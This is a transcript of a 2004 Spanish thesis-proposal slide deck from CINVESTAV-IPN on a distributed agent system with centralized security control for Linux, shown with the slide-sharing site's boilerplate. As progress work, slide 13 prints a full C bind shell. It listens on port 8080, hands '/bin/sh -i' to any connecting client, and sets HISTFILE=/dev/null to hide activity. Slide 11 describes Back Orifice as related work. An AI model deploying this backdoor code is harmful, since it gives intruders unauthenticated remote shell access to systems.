La descarga está en progreso. Por favor, espere

La descarga está en progreso. Por favor, espere

Centro de Investigación y de Estudios Avanzad del IPN. Departamento de Ingeniería Eléctrica. Sección de Computación Sistema Distribuido de Agentes con.

Publicada porVíctor Moya Romero Modificado hace 9 años

Presentaciones similares

Presentación del tema: "Centro de Investigación y de Estudios Avanzad del IPN. Departamento de Ingeniería Eléctrica. Sección de Computación Sistema Distribuido de Agentes con."— Transcripción de la presentación:

1 Centro de Investigación y de Estudios Avanzad del IPN. Departamento de Ingeniería Eléctrica. Sección de Computación Sistema Distribuido de Agentes con Control Centralizado de seguridad. Tesista: Mario Irán Florentino Parra Hernández. Director de tesis: Dr. Jorge Buenabad Chávez. 09 / Nov. / 2004

2 Antecedentes. Limitantes. Objetivos. Metodologia Conograma. Productos esperados. Avances. Referencias. Agenda. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

3 Antecedentes. En los últimos años Internet a permitido nuevas formas de comunicación entre sistemas computacionales. Por lo que se han creado mecanismos de seguridad que tratan de prevenir accesos sin autorización como son: Protección perimetral (firewalls). Sistemas de Detección de Intrusos ( SDIs). Antivirus. VPN. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

4 Antecedentes ( Cont.) El crecimiento del Internet implica riesgos de seguridad en los sistemas computacionales por eventos maliciosos como son: Personas no autorizadas que acceden desde Internet. Virus Informático se encuentran en constante acoso a sistemas desde Internet. Usuarios autorizados que intentan tener privilegios adicionales. Usuarios abusan de los privilegios otorgados Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

5 Limitantes. Las limitantes que presentan los sistemas de seguridad es su Confiabilidad. Trabajan con reglas de seguridad que con el tiempo tienden hacer obsoletas.

6 Objetivos Objetivo General. Desarrollar un sistema distribuido de agentes con control centralizado que administre la seguridad en sistemas distribuidos en plataforma LINUX. Objetivo Particular. Implementar agentes en sistemas red en plataforma LINUX que administren la seguridad en cada estación de trabajo. Implementación de una interfaz grafica que administre a los agentes mediante protocolos de comunicación y autentificación.

7 Esquematización. Internet Red interna Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004 CONTROL CENTRALIZADO

8 Metodologia. Etapa 1 Análisis y selección. Agentes. Obtención de privilegio de en Linux. Protocolos de Comunicación y Autentificación. GTK. Etapa 2 Diseño Etapa 3 Implementación. Etapa 4 Pruebas. Etapa 5 Documentación de la tesis.

9 Cronograma Etapa1234567891011 An á lisis y Selecci ó n. ( Desarrollo de Protocolo) Dise ñ o. Implementaci ó n. Pruebas. Documentaci ó n. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

10 Productos esperados. Desarrollo de Agentes sobre Linux. Desarrollo del Control Centralizado administrador de los agentes. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

11 Avance Back Orifice. Es una pequeña utilidad para el control remoto de equipos. Se compone basicamente de dos elementos: el cliente y el servidor. Controlar remotamente estaciones Windows. Desarrollado por un grupo de Hacker que se hacen llamar Cult of the Dead Cow. Se distribuyen como si fuera un virus por lo que no es muy confiable. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004 Trabajo Relacionado.

12 Avance (Cont.) Back Orifice. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

13 Avace (Cont). Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004 #include #define DEFAULT_PORT 8080 int main(int argc,char **argv) { char *name[3];char *env[2]; int fd,fd2,fromlen; int port; struct sockaddr_in serv; unsigned char *ptr; port=DEFAULT_PORT; signal(SIGCHLD,sig_hand); if((fd=socket(AF_INET,SOCK_STREAM,0))<0) { exit(1); } serv.sin_addr.s_addr=0; serv.sin_port=htons(port); serv.sin_family=AF_INET; if(bind(fd,(struct sockaddr *)&serv,16)) { exit(1); } if(listen(fd,5)) { exit(1); } for(;;) { fromlen=sizeof(struct sockaddr); fd2=accept(fd,(struct sockaddr *)&serv,&fromlen); if (fd2<0) continue; if (fork()) { close(fd2); } else { close(fd); /* Se redirecciona la entrada y salida*/ dup2(fd2,0); dup2(fd2,1); dup2(fd2,2); name[0]="/bin/sh"; name[1]="-i"; name[2]=NULL; env[0]="HISTFILE=/dev/null"; env[1]=NULL; execve(name[0],name,env); exit(1); } } } UNIX Network Programming

14 Avance (Cont). Herramienta para el desarrollo de software basado en agentes tanto de carácter comercial como académico. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004 AgentBuilder http://www.agentbuilder.com/

15 Referencias UNIX Network Programming, Volume 1, Second Edition: Networking APIs: Sockets and XTI, Prentice Hall, 1998. Richard Stevens. UNIX Network Programming, Volume 2, Second Edition: Interprocess Communications, Prentice Hall, 1999. Richard Stevens. Allen Julie, et al, “State of the Practice of Intrusion Detection Technologies”, Carnegie Mellon Software Enginneering Institute, January 2000. Caswell Brian, Roesh Marty, Snort The Open Source Network Intrusion Detection System, 2004. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Descargar ppt "Centro de Investigación y de Estudios Avanzad del IPN. Departamento de Ingeniería Eléctrica. Sección de Computación Sistema Distribuido de Agentes con."

Presentaciones similares

Por Profa. Emma Gutiérrez

Por Profa. Emma Gutiérrez
Juan Antonio Pérez-Campanero Atanasio

Juan Antonio Pérez-Campanero Atanasio
Control Interno Informático. Concepto

Control Interno Informático. Concepto
Jorge De Nova Segundo UD9: Instalación y administración de otros servicios de red e Internet Servicio de terminal remoto.

Jorge De Nova Segundo UD9: Instalación y administración de otros servicios de red e Internet Servicio de terminal remoto.
Firewalls COMP 417.

Firewalls COMP 417.
Certificación de procesos en Linux

Certificación de procesos en Linux
Tesista: Jesús Rubén Hernández Carrillo

Tesista: Jesús Rubén Hernández Carrillo
ESET Endpoint Security y ESET Endpoint Antivirus

ESET Endpoint Security y ESET Endpoint Antivirus
Diseñar un sistema que permita al usuario desde un teléfono móvil acceder a su computador personal (o servidor) a través de WAP para administrar algunos.

Diseñar un sistema que permita al usuario desde un teléfono móvil acceder a su computador personal (o servidor) a través de WAP para administrar algunos.
Sistema desarrollado Control de la Producción

Sistema desarrollado Control de la Producción
Manuel H. Santander P. Equipo de Seguridad y Contingencia Informática

Manuel H. Santander P. Equipo de Seguridad y Contingencia Informática
Ing. Horacio Carlos Sagredo Tejerina

Ing. Horacio Carlos Sagredo Tejerina
Outpost Network Security

Outpost Network Security
DETECCIÓN DE INTRUSOS rodríguez García Juan Carlos 3812

DETECCIÓN DE INTRUSOS rodríguez García Juan Carlos 3812
SILVIA BEATRIZ GAVILANES NARANJO KELLY VERÓNICA CARVAJAL CUJI

SILVIA BEATRIZ GAVILANES NARANJO KELLY VERÓNICA CARVAJAL CUJI
ESCUELA POLITÉCNICA DEL EJÉRCITO

ESCUELA POLITÉCNICA DEL EJÉRCITO
Módulo Control de Activos e Inventario

Módulo Control de Activos e Inventario
Base de Datos Distribuidas

Base de Datos Distribuidas
Conexiones remotas Por Álvaro Bustillo. Índice ¿Qué son y para que sirven? Tipos Algunos programas… Ejemplos.

Conexiones remotas Por Álvaro Bustillo. Índice ¿Qué son y para que sirven? Tipos Algunos programas… Ejemplos.
SISTEMAS OPERATIVOS DE RED

SISTEMAS OPERATIVOS DE RED

Presentaciones similares

Anuncios Google